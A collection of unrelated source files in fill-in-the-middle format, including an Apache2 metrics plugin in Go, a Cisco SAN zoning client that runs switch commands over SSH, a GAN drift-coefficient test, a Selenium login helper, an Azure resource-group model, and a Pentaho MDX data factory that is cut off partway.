<|file_name|>incident.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import from future import standard_library standard_library.install_aliases() from builtins import * import logging import emission.core.wrapper.wrapperbase as ecwb class Incident(ecwb.WrapperBase): props = {"loc": ecwb.WrapperBase.Access.RO, # geojson representation of the point "ts": ecwb.WrapperBase.Access.RO, # timestamp representation of the point "stress": ecwb.WrapperBase.Access.RO, # stress level (0 = no stress, 100 = max stress) "local_dt": ecwb.WrapperBase.Access.RO, # searchable datetime in local time "fmt_time": ecwb.WrapperBase.Access.RO # formatted time } enums = {} geojson = ["loc"] nullable = [] local_dates = ["local_dt"] def _populateDependencies(self):<|fim▁hole|><|fim▁end|>
pass
<|file_name|>apache2.go<|end_file_name|><|fim▁begin|>package mpapache2 import ( "errors" "fmt" "io/ioutil" "net/http" "os" "regexp" "strconv" "strings" mp "github.com/mackerelio/go-mackerel-plugin-helper" "github.com/urfave/cli" ) // Apache2Plugin for fetching metrics type Apache2Plugin struct { Host string Port uint16 Path string Header []string Tempfile string Prefix string LabelPrefix string } // MetricKeyPrefix interface for PluginWithPrefix func (c Apache2Plugin) MetricKeyPrefix() string { if c.Prefix == "" { c.Prefix = "apache2" } return c.Prefix } // GraphDefinition Graph definition func (c Apache2Plugin) GraphDefinition() map[string]mp.Graphs { labelPrefix := c.LabelPrefix // metric value structure var graphdef = map[string]mp.Graphs{ "workers": { Label: (labelPrefix + " Workers"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "busy_workers", Label: "Busy Workers", Diff: false, Stacked: true}, {Name: "idle_workers", Label: "Idle Workers", Diff: false, Stacked: true}, }, }, "bytes": { Label: (labelPrefix + " Bytes"), Unit: "bytes", Metrics: []mp.Metrics{ {Name: "bytes_sent", Label: "Bytes Sent", Diff: true, Type: "uint64"}, }, }, "cpu": { Label: (labelPrefix + " CPU Load"), Unit: "float", Metrics: []mp.Metrics{ {Name: "cpu_load", Label: "CPU Load", Diff: false}, }, }, "req": { Label: (labelPrefix + " Requests"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "requests", Label: "Requests", Diff: true, Type: "uint64"}, }, }, "scoreboard": { Label: (labelPrefix + " Scoreboard"), Unit: "integer", Metrics: []mp.Metrics{ {Name: "score-_", Label: "Waiting for connection", Diff: false, Stacked: true}, {Name: "score-S", Label: "Starting up", Diff: false, Stacked: true}, {Name: "score-R", Label: "Reading request", Diff: false, Stacked: true}, {Name: "score-W", Label: "Sending reply", Diff: false, Stacked: true}, {Name: "score-K", Label: "Keepalive", Diff: false, Stacked: true}, {Name: "score-D", Label: "DNS lookup", Diff: false, Stacked: true}, {Name: "score-C", Label: "Closing connection", Diff: false, Stacked: true}, {Name: "score-L", Label: "Logging", Diff: false, Stacked: true}, {Name: "score-G", Label: "Gracefully finishing", Diff: false, Stacked: true}, {Name: "score-I", Label: "Idle cleanup", Diff: false, Stacked: true}, {Name: "score-", Label: "Open slot", Diff: false, Stacked: true}, }, }, } return graphdef } // main function func doMain(c *cli.Context) error { var apache2 Apache2Plugin apache2.Host = c.String("http_host") apache2.Port = uint16(c.Int("http_port")) apache2.Path = c.String("status_page") apache2.Header = c.StringSlice("header") apache2.Prefix = c.String("metric-key-prefix") apache2.LabelPrefix = c.String("metric-label-prefix") helper := mp.NewMackerelPlugin(apache2) helper.Tempfile = c.String("tempfile") helper.Run() return nil } // FetchMetrics fetch the metrics func (c Apache2Plugin) FetchMetrics() (map[string]interface{}, error) { data, err := getApache2Metrics(c.Host, c.Port, c.Path, c.Header) if err != nil { return nil, err } stat := make(map[string]interface{}) errStat := parseApache2Status(data, &stat) if errStat != nil { return nil, errStat } errScore := parseApache2Scoreboard(data, &stat) if errScore != nil { return nil, errScore } return stat, nil } // parsing scoreboard from server-status?auto func parseApache2Scoreboard(str string, p *map[string]interface{}) error { for _, line := range strings.Split(str, "\n") { matched, err := regexp.MatchString("Scoreboard(.*)", line) if err != nil { return err } if !matched { continue } record := strings.Split(line, ":") for _, sb := range strings.Split(strings.Trim(record[1], " "), "") { if sb == "." { sb = "" } name := fmt.Sprintf("score-%s", sb)<|fim▁hole|> c, assert := (*p)[name].(float64) if !assert { c = 0.0 } (*p)[name] = c + 1.0 } return nil } return errors.New("scoreboard data is not found") } // parsing metrics from server-status?auto func parseApache2Status(str string, p *map[string]interface{}) error { Params := map[string]string{ "Total Accesses": "requests", "Total kBytes": "bytes_sent", "CPULoad": "cpu_load", "BusyWorkers": "busy_workers", "IdleWorkers": "idle_workers"} for _, line := range strings.Split(str, "\n") { record := strings.Split(line, ":") _, assert := Params[record[0]] if !assert { continue } var errParse error (*p)[Params[record[0]]], errParse = strconv.ParseFloat(strings.Trim(record[1], " "), 64) if errParse != nil { return errParse } } if len(*p) == 0 { return errors.New("status data not found") } return nil } // Getting apache2 status from server-status module data. func getApache2Metrics(host string, port uint16, path string, header []string) (string, error) { uri := "http://" + host + ":" + strconv.FormatUint(uint64(port), 10) + path req, err := http.NewRequest("GET", uri, nil) if err != nil { return "", err } for _, h := range header { kv := strings.SplitN(h, ":", 2) var k, v string k = strings.TrimSpace(kv[0]) if len(kv) == 2 { v = strings.TrimSpace(kv[1]) } if http.CanonicalHeaderKey(k) == "Host" { req.Host = v } else { req.Header.Set(k, v) } } resp, err := http.DefaultClient.Do(req) if err != nil { return "", err } if resp.StatusCode != http.StatusOK { return "", fmt.Errorf("HTTP status error: %d", resp.StatusCode) } body, err := ioutil.ReadAll(resp.Body) resp.Body.Close() if err != nil { return "", err } return string(body[:]), nil } // Do the plugin func Do() { app := cli.NewApp() app.Name = "apache2_metrics" app.Version = version app.Usage = "Get metrics from apache2." app.Author = "Yuichiro Saito" app.Email = "[email protected]" app.Flags = flags app.Action = doMain app.Run(os.Args) }<|fim▁end|>
<|file_name|>main.go<|end_file_name|><|fim▁begin|>// This file is part of Gate. // Copyright (C) 2012-2015 Cyril Adrian <[email protected]> // // Gate is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, version 3 of the License. // // Gate is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details.<|fim▁hole|>// // You should have received a copy of the GNU General Public License // along with Gate. If not, see <http://www.gnu.org/licenses/>. package main import ( "gate/client" "gate/core" ) import ( "log" "os" ) func main() { cfg, err := core.NewConfig() if err != nil { log.Fatalln(err) } err = client.Console(cfg) if err != nil { log.Fatalln(err) } os.Exit(0) }<|fim▁end|>
<|file_name|>cisco_fc_zone_client_cli.py<|end_file_name|><|fim▁begin|># (c) Copyright 2014 Cisco Systems Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # """ Script to push the zone configuration to Cisco SAN switches. """ import random import re from eventlet import greenthread from oslo_concurrency import processutils from oslo_log import log as logging from oslo_utils import excutils import six from cinder import exception from cinder.i18n import _ from cinder import ssh_utils from cinder import utils from cinder.zonemanager.drivers.cisco import exception as c_exception import cinder.zonemanager.drivers.cisco.fc_zone_constants as ZoneConstant LOG = logging.getLogger(__name__) class CiscoFCZoneClientCLI(object): """Cisco FC zone client cli implementation. OpenStack Fibre Channel zone client cli connector to manage FC zoning in Cisco SAN fabrics. Version history: 1.0 - Initial Cisco FC zone client cli """ switch_ip = None switch_port = '22' switch_user = 'admin' switch_pwd = 'none' def __init__(self, ipaddress, username, password, port, vsan): """initializing the client.""" self.switch_ip = ipaddress self.switch_port = port self.switch_user = username self.switch_pwd = password self.fabric_vsan = vsan self.sshpool = None def get_active_zone_set(self): """Return the active zone configuration. Return active zoneset from fabric. When none of the configurations are active then it will return empty map. :returns: Map -- active zone set map in the following format .. code-block:: python { 'zones': {'openstack50060b0000c26604201900051ee8e329': ['50060b0000c26604', '201900051ee8e329'] }, 'active_zone_config': 'OpenStack_Cfg' } """ zone_set = {} zone = {} zone_member = None zone_name = None switch_data = None zone_set_name = None try: switch_data = self._get_switch_info( [ZoneConstant.GET_ACTIVE_ZONE_CFG, self.fabric_vsan, ' | no-more']) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed getting active zone set " "from fabric %s", self.switch_ip) try: for line in switch_data: # Split on non-word characters, line_split = re.split(r'[\s\[\]]+', line) if ZoneConstant.CFG_ZONESET in line_split: # zoneset name [name] vsan [vsan] zone_set_name = \ line_split[line_split.index(ZoneConstant.CFG_ZONESET) + 2] continue if ZoneConstant.CFG_ZONE in line_split: # zone name [name] vsan [vsan] zone_name = \ line_split[line_split.index(ZoneConstant.CFG_ZONE) + 2] zone[zone_name] = list() continue if ZoneConstant.CFG_ZONE_MEMBER in line_split: # Examples: # pwwn c0:50:76:05:15:9f:00:12 # * fcid 0x1e01c0 [pwwn 50:05:07:68:02:20:48:04] [V7K_N1P2] zone_member = \ line_split[ line_split.index(ZoneConstant.CFG_ZONE_MEMBER) + 1] zone_member_list = zone.get(zone_name) zone_member_list.append(zone_member) zone_set[ZoneConstant.CFG_ZONES] = zone zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] = zone_set_name except Exception as ex: # In case of parsing error here, it should be malformed cli output. msg = _("Malformed zone configuration: (switch=%(switch)s " "zone_config=%(zone_config)s)." ) % {'switch': self.switch_ip, 'zone_config': switch_data} LOG.error(msg) exc_msg = _("Exception: %s") % six.text_type(ex) LOG.error(exc_msg) raise exception.FCZoneDriverException(reason=msg) return zone_set def add_zones(self, zones, activate, fabric_vsan, active_zone_set, zone_status): """Add zone configuration. This method will add the zone configuration passed by user. :param zones: Zone names mapped to members and VSANs Zone members are colon separated but case-insensitive .. code-block:: python { zonename1:[zonememeber1,zonemember2,...], zonename2:[zonemember1, zonemember2,...]...} e.g: { 'openstack50060b0000c26604201900051ee8e329': ['50:06:0b:00:00:c2:66:04', '20:19:00:05:1e:e8:e3:29'] } :param activate: True will activate the zone config. :param fabric_vsan: :param active_zone_set: Active zone set dict retrieved from get_active_zone_set method :param zone_status: Status of the zone :raises CiscoZoningCliException: """ LOG.debug("Add Zones - Zones passed: %s", zones) LOG.debug("Active zone set: %s", active_zone_set) zone_list = active_zone_set[ZoneConstant.CFG_ZONES] LOG.debug("zone list: %s", zone_list) LOG.debug("zone status: %s", zone_status) cfg_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] zone_cmds = [['conf'], ['zoneset', 'name', cfg_name, 'vsan', fabric_vsan]] for zone in zones.keys(): zone_cmds.append(['zone', 'name', zone]) for member in zones[zone]: zone_cmds.append(['member', 'pwwn', member]) zone_cmds.append(['end']) try: LOG.debug("Add zones: Config cmd to run: %s", zone_cmds) self._ssh_execute(zone_cmds, True, 1) if activate: self.activate_zoneset(cfg_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = _("Creating and activating zone set failed: " "(Zone set=%(zoneset)s error=%(err)s)." ) % {'zoneset': cfg_name, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def update_zones(self, zones, activate, fabric_vsan, operation, active_zone_set, zone_status): """Update the zone configuration. This method will update the zone configuration passed by user. :param zones: zone names mapped to members. Zone members are colon separated but case-insensitive .. code-block:: python { zonename1:[zonememeber1, zonemember2,...], zonename2:[zonemember1, zonemember2,...]...} e.g: { 'openstack50060b0000c26604201900051ee8e329': ['50:06:0b:00:00:c2:66:04', '20:19:00:05:1e:e8:e3:29'] } :param activate: True will activate the zone config. :param operation: zone add or zone remove :param fabric_vsan: Virtual San # :param active_zone_set: Active zone set dict retrieved from get_active_zone_set method :param zone_status: Status of the zone :raises CiscoZoningCliException: """ LOG.debug("Update Zones - Operation: %(op)s - Zones " "passed: %(zones)s", {'op': operation, 'zones': zones}) cfg_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] zone_cmds = [['conf'], ['zoneset', 'name', cfg_name, 'vsan', fabric_vsan]] zone_mod_cmd = [] if operation == ZoneConstant.ZONE_ADD: zone_mod_cmd = ['member', 'pwwn'] elif operation == ZoneConstant.ZONE_REMOVE: zone_mod_cmd = ['no', 'member', 'pwwn'] for zone, zone_members in zones.items(): zone_cmds.append(['zone', 'name', zone]) for member in zone_members: zone_cmds.append(zone_mod_cmd + [member]) zone_cmds.append(['end']) try: LOG.debug("Update zones: Config cmd to run: %s", zone_cmds) self._ssh_execute(zone_cmds, True, 1) if activate: self.activate_zoneset(cfg_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = (_("Updating and activating zone set failed: " "(Zone set=%(zoneset)s error=%(err)s).") % {'zoneset': cfg_name, 'err': six.text_type(e)}) LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def activate_zoneset(self, cfgname, fabric_vsan, zone_status): """Method to Activate the zone config. Param cfgname - ZonesetName.""" LOG.debug("zone status: %s", zone_status) cmd_list = [['conf'], ['zoneset', 'activate', 'name', cfgname, 'vsan', self.fabric_vsan]] if zone_status['mode'] == 'enhanced': cmd_list.append(['zone', 'commit', 'vsan', fabric_vsan]) cmd_list.append(['end']) return self._ssh_execute(cmd_list, True, 1) def get_zoning_status(self): """Return the zoning mode and session for a zoneset.""" zone_status = {} try: switch_data = self._get_switch_info( [ZoneConstant.GET_ZONE_STATUS, self.fabric_vsan]) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed getting zone status " "from fabric %s", self.switch_ip) try: for line in switch_data: # Split on non-word characters, line_split = re.split(r'[\s\[\]]+', line) if 'mode:' in line_split: # mode: <enhanced|basic> zone_status['mode'] = line_split[line_split.index('mode:') + 1] continue if 'session:' in line_split: # session: <none|a value other than none> zone_status['session'] = \ line_split[line_split.index('session:') + 1] continue except Exception as ex: # In case of parsing error here, it should be malformed cli output. msg = _("Malformed zone status: (switch=%(switch)s " "zone_config=%(zone_config)s)." ) % {'switch': self.switch_ip, 'zone_status': switch_data} LOG.error(msg) exc_msg = _("Exception: %s") % six.text_type(ex) LOG.error(exc_msg) raise exception.FCZoneDriverException(reason=msg) return zone_status def delete_zones(self, zone_names, activate, fabric_vsan, active_zone_set, zone_status): """Delete zones from fabric. Method to delete the active zone config zones params zone_names: zoneNames separated by semicolon params activate: True/False """ LOG.debug("zone_names %s", zone_names) active_zoneset_name = active_zone_set[ZoneConstant.ACTIVE_ZONE_CONFIG] cmds = [['conf'], ['zoneset', 'name', active_zoneset_name, 'vsan', fabric_vsan]] try: for zone in set(zone_names.split(';')): cmds.append(['no', 'zone', 'name', zone]) cmds.append(['end']) LOG.debug("Delete zones: Config cmd to run: %s", cmds) self._ssh_execute(cmds, True, 1) if activate: self.activate_zoneset(active_zoneset_name, fabric_vsan, zone_status) self._cfg_save() except Exception as e: msg = _("Deleting zones failed: (command=%(cmd)s error=%(err)s)." ) % {'cmd': cmds, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def get_nameserver_info(self): """Get name server data from fabric. This method will return the connected node port wwn list(local and remote) for the given switch fabric show fcns database """ cli_output = None return_list = [] try: cli_output = self._get_switch_info([ZoneConstant.FCNS_SHOW, self.fabric_vsan]) except c_exception.CiscoZoningCliException: with excutils.save_and_reraise_exception(): LOG.error("Failed collecting fcns database " "info for fabric %s", self.switch_ip) if (cli_output): return_list = self._parse_ns_output(cli_output) LOG.info("Connector returning fcnsinfo-%s", return_list) return return_list @utils.retry(processutils.ProcessExecutionError, retries=5) def _cfg_save(self): cmd = ['copy', 'running-config', 'startup-config'] self._run_ssh(cmd, True) def _get_switch_info(self, cmd_list): stdout, stderr, sw_data = None, None, None try: stdout, stderr = self._run_ssh(cmd_list, True) LOG.debug("CLI output from ssh - output: %s", stdout) if (stdout): sw_data = stdout.splitlines() return sw_data except processutils.ProcessExecutionError as e: msg = _("Error while getting data via ssh: (command=%(cmd)s " "error=%(err)s).") % {'cmd': cmd_list, 'err': six.text_type(e)} LOG.error(msg) raise c_exception.CiscoZoningCliException(reason=msg) def _parse_ns_output(self, switch_data): """Parses name server data. Parses nameserver raw data and adds the device port wwns to the list :returns: List -- list of device port wwn from ns info """ return_list = [] for line in switch_data: if not(" N " in line): continue linesplit = line.split() if len(linesplit) > 2:<|fim▁hole|> else: msg = _("Malformed show fcns database string: %s") % line LOG.error(msg) raise exception.InvalidParameterValue(err=msg) return return_list def _run_ssh(self, cmd_list, check_exit_code=True): command = ' '.join(cmd_list) if not self.sshpool: self.sshpool = ssh_utils.SSHPool(self.switch_ip, self.switch_port, None, self.switch_user, self.switch_pwd, min_size=1, max_size=5) try: with self.sshpool.item() as ssh: return processutils.ssh_execute( ssh, command, check_exit_code=check_exit_code) except Exception: with excutils.save_and_reraise_exception(): LOG.warning("Error running SSH command: %s", command) def _ssh_execute(self, cmd_list, check_exit_code=True, attempts=1): """Execute cli with status update. Executes CLI commands where status return is expected. cmd_list is a list of commands, where each command is itself a list of parameters. We use utils.check_ssh_injection to check each command, but then join then with " ; " to form a single command. """ # Check that each command is secure for cmd in cmd_list: utils.check_ssh_injection(cmd) # Combine into a single command. command = ' ; '.join(map(lambda x: ' '.join(x), cmd_list)) if not self.sshpool: self.sshpool = ssh_utils.SSHPool(self.switch_ip, self.switch_port, None, self.switch_user, self.switch_pwd, min_size=1, max_size=5) stdin, stdout, stderr = None, None, None LOG.debug("Executing command via ssh: %s", command) last_exception = None try: with self.sshpool.item() as ssh: while attempts > 0: attempts -= 1 try: stdin, stdout, stderr = ssh.exec_command(command) channel = stdout.channel exit_status = channel.recv_exit_status() LOG.debug("Exit Status from ssh: %s", exit_status) # exit_status == -1 if no exit code was returned if exit_status != -1: LOG.debug('Result was %s', exit_status) if check_exit_code and exit_status != 0: raise processutils.ProcessExecutionError( exit_code=exit_status, stdout=stdout, stderr=stderr, cmd=command) else: return True else: return True except Exception as e: LOG.exception('Error executing SSH command.') last_exception = e greenthread.sleep(random.randint(20, 500) / 100.0) LOG.debug("Handling error case after SSH: %s", last_exception) try: raise processutils.ProcessExecutionError( exit_code=last_exception.exit_code, stdout=last_exception.stdout, stderr=last_exception.stderr, cmd=last_exception.cmd) except AttributeError: raise processutils.ProcessExecutionError( exit_code=-1, stdout="", stderr="Error running SSH command", cmd=command) except Exception: with excutils.save_and_reraise_exception(): LOG.exception("Error executing command via ssh.") finally: if stdin: stdin.flush() stdin.close() if stdout: stdout.close() if stderr: stderr.close() def cleanup(self): self.sshpool = None<|fim▁end|>
node_port_wwn = linesplit[2] return_list.append(node_port_wwn)
<|file_name|>drift_utils_test.py<|end_file_name|><|fim▁begin|># Copyright 2021 DeepMind Technologies Limited and Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Drift utils test.""" from absl.testing import absltest from absl.testing import parameterized from dd_two_player_games import drift_utils from dd_two_player_games import gan LEARNING_RATE_TUPLES = [ (0.01, 0.01), (0.01, 0.05), (0.05, 0.01), (0.0001, 0.5)] class DriftUtilsTest(parameterized.TestCase): """Test class to ensure drift coefficients are computed correctly. Ensures that the drift coefficients in two-player games are computed as for the math for: * simultaneous updates. * alternating updates (for both player orders). """ @parameterized.parameters(LEARNING_RATE_TUPLES) def test_sim_updates(self, disc_lr, gen_lr): # player order does not matter. # the number of updates does not matter for simultaneous updates. learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) drift_coeffs = drift_utils.get_dd_coeffs( None, True, learning_rates, num_updates=None) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual(drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual(drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr) @parameterized.parameters(LEARNING_RATE_TUPLES) def test_alt_updates(self, disc_lr, gen_lr): learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) num_updates = gan.GANTuple(disc=1, gen=1) drift_coeffs = drift_utils.get_dd_coeffs( drift_utils.PlayerOrder.disc_first, False, learning_rates, num_updates=num_updates) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual(drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual( drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr * (1 - 2 * disc_lr / gen_lr)) @parameterized.parameters(LEARNING_RATE_TUPLES) def test_alt_updates_change_player_order(self, disc_lr, gen_lr):<|fim▁hole|> learning_rates = gan.GANTuple(disc=disc_lr, gen=gen_lr) num_updates = gan.GANTuple(disc=1, gen=1) drift_coeffs = drift_utils.get_dd_coeffs( drift_utils.PlayerOrder.gen_first, False, learning_rates, num_updates=num_updates) self.assertEqual(drift_coeffs.disc.self_norm, 0.5 * disc_lr) self.assertEqual(drift_coeffs.disc.other_norm, 0.0) self.assertEqual( drift_coeffs.disc.other_dot_prod, 0.5 * disc_lr * (1 - 2 * gen_lr / disc_lr)) self.assertEqual(drift_coeffs.gen.self_norm, 0.5 * gen_lr) self.assertEqual(drift_coeffs.gen.other_norm, 0.0) self.assertEqual(drift_coeffs.gen.other_dot_prod, 0.5 * gen_lr) if __name__ == '__main__': absltest.main()<|fim▁end|>
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>pub mod category; pub mod question;<|fim▁hole|><|fim▁end|>
pub mod dashboard;
<|file_name|>session.py<|end_file_name|><|fim▁begin|># Класс-помощник для работы с сессией class SessionHelper: def __init__(self, app): self.app = app # Функция входа на сайт def login(self, username, password): wd = self.app.wd<|fim▁hole|> wd.find_element_by_name("pass").click() wd.find_element_by_name("pass").clear() wd.find_element_by_name("pass").send_keys(password) wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click() # Функция выхода с сайта def logout(self): wd = self.app.wd wd.find_element_by_link_text("Logout").click() # Функция удаления фикстуры после завершения теста def destroy(self): self.app.wd.quit() # Функция проверки выхода с сайта def ensure_logout(self): wd = self.app.wd if self.is_logged_in(): self.logout() # Функция проверки входа на сайт def is_logged_in(self): wd = self.app.wd # Если на странице есть элемент с текстом "Logout", то пользователь вошел на сайт return len(wd.find_elements_by_link_text("Logout")) > 0 # Функция проверки имени с которым произошел вход на сайт def is_logged_in_as(self, username): wd = self.app.wd # Если на странице есть элемент с текстом который соответсвует имени пользователя, то есть логин return wd.find_element_by_xpath("//div/div[1]/form/b").text == "("+username+")" # Функция проверки логина во время прогона тестов def ensure_login(self, username, password): wd = self.app.wd # Если пользователь вошел на сайт if self.is_logged_in(): # И если пользователь вошел на сайт под ожидаемым именем if self.is_logged_in_as(username): # Тогда ничего не делаем return else: # Иначе производим выход с сайта, для последующего входа self.logout() self.login(username, password)<|fim▁end|>
self.app.open_home_page() wd.find_element_by_name("user").click() wd.find_element_by_name("user").clear() wd.find_element_by_name("user").send_keys(username)
<|file_name|>ResourceGroupInner.java<|end_file_name|><|fim▁begin|>/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.resources.implementation; import com.microsoft.azure.management.resources.ResourceGroupProperties; import java.util.Map; import com.fasterxml.jackson.annotation.JsonProperty; /** * Resource group information. */ public class ResourceGroupInner { /** * The ID of the resource group. */ @JsonProperty(access = JsonProperty.Access.WRITE_ONLY) private String id; /** * The name of the resource group. */ private String name; /** * The properties property. */ private ResourceGroupProperties properties; /** * The location of the resource group. It cannot be changed after the * resource group has been created. It muct be one of the supported Azure * locations. */ @JsonProperty(required = true) private String location; /** * The ID of the resource that manages this resource group. */ private String managedBy; /** * The tags attached to the resource group. */ private Map<String, String> tags; /** * Get the id value. * * @return the id value */ public String id() { return this.id; } /** * Get the name value. * * @return the name value */ public String name() { return this.name; } /** * Set the name value. * * @param name the name value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withName(String name) { this.name = name; return this; } /** * Get the properties value. * * @return the properties value */ public ResourceGroupProperties properties() { return this.properties; } /** * Set the properties value. * * @param properties the properties value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withProperties(ResourceGroupProperties properties) { this.properties = properties; return this; } /** * Get the location value. * * @return the location value */ public String location() { return this.location; } <|fim▁hole|> * * @param location the location value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withLocation(String location) { this.location = location; return this; } /** * Get the managedBy value. * * @return the managedBy value */ public String managedBy() { return this.managedBy; } /** * Set the managedBy value. * * @param managedBy the managedBy value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withManagedBy(String managedBy) { this.managedBy = managedBy; return this; } /** * Get the tags value. * * @return the tags value */ public Map<String, String> tags() { return this.tags; } /** * Set the tags value. * * @param tags the tags value to set * @return the ResourceGroupInner object itself. */ public ResourceGroupInner withTags(Map<String, String> tags) { this.tags = tags; return this; } }<|fim▁end|>
/** * Set the location value.
<|file_name|>AbstractMDXDataFactory.java<|end_file_name|><|fim▁begin|>/*! * This program is free software; you can redistribute it and/or modify it under the * terms of the GNU Lesser General Public License, version 2.1 as published by the Free Software * Foundation. * * You should have received a copy of the GNU Lesser General Public License along with this * program; if not, you can obtain a copy at http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html * or from the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. * * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * See the GNU Lesser General Public License for more details. * * Copyright (c) 2002-2013 Pentaho Corporation.. All rights reserved. */ package org.pentaho.reporting.engine.classic.extensions.datasources.mondrian; import mondrian.mdx.MemberExpr; import mondrian.olap.CacheControl; import mondrian.olap.Connection; import mondrian.olap.Cube; import mondrian.olap.Exp; import mondrian.olap.Hierarchy; import mondrian.olap.Literal; import mondrian.olap.Member; import mondrian.olap.MondrianException; import mondrian.olap.MondrianProperties; import mondrian.olap.OlapElement; import mondrian.olap.Parameter; import mondrian.olap.Position; import mondrian.olap.Query; import mondrian.olap.Result; import mondrian.olap.Util; import mondrian.olap.type.MemberType; import mondrian.olap.type.NumericType; import mondrian.olap.type.SetType; import mondrian.olap.type.StringType; import mondrian.olap.type.Type; import mondrian.server.Statement; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.pentaho.reporting.engine.classic.core.AbstractDataFactory; import org.pentaho.reporting.engine.classic.core.ClassicEngineBoot; import org.pentaho.reporting.engine.classic.core.DataFactory; import org.pentaho.reporting.engine.classic.core.DataFactoryContext; import org.pentaho.reporting.engine.classic.core.DataRow; import org.pentaho.reporting.engine.classic.core.ReportDataFactoryException; import org.pentaho.reporting.engine.classic.core.util.PropertyLookupParser; import org.pentaho.reporting.libraries.base.config.Configuration; import org.pentaho.reporting.libraries.base.util.CSVTokenizer; import org.pentaho.reporting.libraries.base.util.ObjectUtilities; import org.pentaho.reporting.libraries.base.util.StringUtils; import org.pentaho.reporting.libraries.formatting.FastMessageFormat; import java.lang.reflect.Array; import java.sql.SQLException; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Properties; import java.util.Set; import java.util.regex.PatternSyntaxException; /** * This data-factory operates in Legacy-Mode providing a preprocessed view on the mondrian result. It behaves exactly as * known from the Pentaho-Platform and the Pentaho-Report-Designer. This mode of operation breaks the structure of the * resulting table as soon as new rows are returned by the server. * * @author Thomas Morgner */ public abstract class AbstractMDXDataFactory extends AbstractDataFactory { /** * The message compiler maps all named references into numeric references. */ protected static class MDXCompiler extends PropertyLookupParser { private HashSet<String> collectedParameter; private DataRow parameters; private Locale locale; /** * Default Constructor. */ protected MDXCompiler( final DataRow parameters, final Locale locale ) { if ( locale == null ) { throw new NullPointerException( "Locale must not be null" ); } if ( parameters == null ) { throw new NullPointerException( "Parameter datarow must not be null" ); } this.collectedParameter = new HashSet<String>(); this.parameters = parameters; this.locale = locale; setMarkerChar( '$' ); setOpeningBraceChar( '{' ); setClosingBraceChar( '}' ); } /** * Looks up the property with the given name. This replaces the name with the current index position. * * @param name the name of the property to look up. * @return the translated value. */ protected String lookupVariable( final String name ) { final CSVTokenizer tokenizer = new CSVTokenizer( name, false ); if ( tokenizer.hasMoreTokens() == false ) { // invalid reference .. return null; } final String parameterName = tokenizer.nextToken(); collectedParameter.add( parameterName ); final Object o = parameters.get( parameterName ); String subType = null; final StringBuilder b = new StringBuilder( name.length() + 4 ); b.append( '{' ); b.append( "0" ); while ( tokenizer.hasMoreTokens() ) { b.append( ',' ); final String token = tokenizer.nextToken(); b.append( token ); if ( subType == null ) { subType = token; } } b.append( '}' ); final String formatString = b.toString(); if ( "string".equals( subType ) ) { if ( o == null ) { return "null"; // NON-NLS } return quote( String.valueOf( o ) ); } final FastMessageFormat messageFormat = new FastMessageFormat( formatString, locale ); return 